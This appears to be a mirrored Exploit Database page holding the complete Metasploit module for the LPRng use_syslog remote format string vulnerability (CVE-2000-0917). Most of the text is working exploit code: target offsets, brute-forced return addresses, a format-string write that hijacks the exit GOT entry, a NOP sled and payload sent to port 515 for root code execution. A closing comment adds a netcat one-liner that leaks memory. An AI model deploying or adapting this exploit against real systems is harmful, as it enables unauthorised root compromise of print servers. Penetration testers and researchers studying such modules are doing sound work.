LPRng – use_syslog Remote Format String (Metasploit)

• Exploit Database
• 11 阅读

• 作者： Metasploit
  日期： 2010-07-03
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/16842/

• ##
  # $Id: lprng_format_string.rb 9666 2010-07-03 01:09:32Z jduck $
  ##
  
  ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # Framework web site for more information on licensing and terms of use.
  # http://metasploit.com/framework/
  ##
  
  
  require 'msf/core'
  
  
  class Metasploit3 < Msf::Exploit::Remote
  	Rank = NormalRanking
  
  	include Msf::Exploit::Remote::Tcp
  	include Msf::Exploit::Brute
  	include Msf::Exploit::FormatString
  
  	def initialize(info = {})
  		super(update_info(info,
  			'Name' => 'LPRng use_syslog Remote Format String Vulnerability',
  			'Description'=> %q{
  					This module exploits a format string vulnerability in the LPRng print server.
  				This vulnerability was discovered by Chris Evans. There was a publicly
  				circulating worm targeting this vulnerability, which prompted RedHat to pull
  				their 7.0 release. They consequently re-released it as "7.0-respin".
  			},
  			'Author' => [ 'jduck' ],
  			'License'=> MSF_LICENSE,
  			'Version'=> '$Revision: 9666 $',
  			'References' =>
  				[
  					[ 'CVE', '2000-0917' ],
  					[ 'OSVDB', '421' ],
  					[ 'BID', '1712' ],
  					[ 'US-CERT-VU', '382365' ],
  					[ 'URL', 'http://www.cert.org/advisories/CA-2000-22.html' ],
  					[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=17756' ],
  					[ 'URL', 'http://www.exploit-db.com/exploits/226' ],
  					[ 'URL', 'http://www.exploit-db.com/exploits/227' ],
  					[ 'URL', 'http://www.exploit-db.com/exploits/230' ]
  				],
  			'Platform' => 'linux',
  			'Arch' => ARCH_X86,
  			'Privileged' => true, # root
  			'DefaultOptions' =>
  				{
  					'PrependSetresuid' => true
  				},
  			'Payload'=>
  				{
  					'Space'=> 130, # buffer size on caldera is 180! (need ~50 for fmt)
  					'BadChars' => "\x00\x0a\x20\x25",
  				},
  			'Targets'=>
  				[
  					# tested OK - jjd
  					[ 'Caldera OpenLinux 2.3 Bruteforce',
  						{
  							'Platform' => 'linux',
  							'NumPops'=> 243,
  							'FlowHook' => 0x80992d4,# GOT of exit
  							# (0x809c180+(41+4+10+48)) - data segment, but gets corrupted
  							'Bruteforce' =>
  								{
  									'Start' => { 'Ret' => 0xcffffff4 },
  									'Stop'=> { 'Ret' => 0x7fffe004 },
  									'Step'=> 16
  								}
  						}
  					],
  =begin
  					# untested (from public exploits)
  					[ 'Slackware 7.0 LPRng-3.6.22.tgz - started from shell',
  						{
  							'NumPops' 	=> 299,
  							'Ret' 	 => 0xbffff640,
  							'FlowHook'	=> 0xbfffee30
  						}
  					],
  					[ 'RedHat 7.0 (Guinness) with LPRng-3.6.22/23/24-1 from rpm - glibc-2.2-5',
  						{
  							'NumPops' 	=> 304,
  							'Ret' 	 => 0xbffff920,
  							'FlowHook'	=> 0xbffff0f0
  						}
  					],
  					[ 'RedHat 7.0 - Guinesss',
  						{
  							'NumPops' 	=> 300,
  							'Ret' 	 => 0x41424344,
  							'FlowHook'	=> 0xbffff3ec
  						}
  					],
  					[ 'RedHat 7.0 - Guinesss-dev',
  						{
  							'NumPops' 	=> 300,
  							'Ret' 	 => 0x41424344,
  							'FlowHook'	=> 0xbffff12c
  						}
  					],
  =end
  					# ...
  					[ 'Debug',
  						{
  							'NumPops' 	=> 1, # sure to miss.
  							'Ret' 	 => 0x41424344,
  							'FlowHook'	=> 0x45464748
  						}
  					]
  				],
  			# 'DefaultTarget' => 0,
  			'DisclosureDate' => 'Sep 25 2000'))
  
  		register_options( [ Opt::RPORT(515) ], self.class )
  	end
  
  
  	def exploit
  		# we want to use DPA for this one :)
  		fmtstr_set_caps(false, true)
  
  		# check syslog to see which number hits 41414141
  =begin
  		400.times { |x|
  			connect
  			buf = "aAAAABBBB|%%%u$x|%u\n" % [x+1, x+1]
  			sock.put(buf)
  			#handler
  			disconnect
  		}
  =end
  		print_status("Trying target #{target.name} ..")
  
  		super
  	end
  
  
  	def brute_exploit(addrs)
  
  		#print_status("Trying target #{target.name} - addr 0x%x..." % addrs['Ret'])
  
  		printed = "Service_connection: bad request line '\\35" # + "'XXXYYYYZZZZ...
  		num_start = printed.length + 2 + 4
  
  		# write 'ret' addr to flowhook (execute shellcode)
  		# NOTE: the resulting two writes must be done at the same time
  
  		# characters (chr(10) > X > chr(99)) will screw up alignment (\XXX in syslog)
  		fmtbuf = "_" * 4
  		fmtbuf << generate_fmt_two_shorts(num_start, target['FlowHook'], addrs['Ret'])
  		#print_status(" hijacker format string buffer is #{fmtbuf.length} bytes")
  
  		# append payload and newline
  		#fmtbuf << payload.encoded
  		fmtbuf << "\x90" * 32
  		fmtbuf << Rex::Text.charset_exclude(payload_badchars)
  		fmtbuf << "\n"
  
  		print_status(" writing 0x%x to 0x%x" % [addrs['Ret'], target['FlowHook']])
  
  		connect
  		#print_status("Sleeping, attach now!!")
  		#select(nil,nil,nil,5)
  
  		sock.put(fmtbuf)
  
  		handler
  		disconnect
  
  	end
  
  end
  
  
  =begin
  
  HRM!
  
  The following causes info leakage!
  
  bash$ ( ruby -e 'puts "\x09" + ("%x" * 50) + "\n"'; cat) | nc 192.168.0.120 515 | hexdump -vC
  
  There are various other ways to trigger the vulnerability. LPD uses the single-byte commands
  0x01 -> 0x09...
  
  It's unclear if there is a way to auto-detect the lpd version via LPD commands.
  
  =end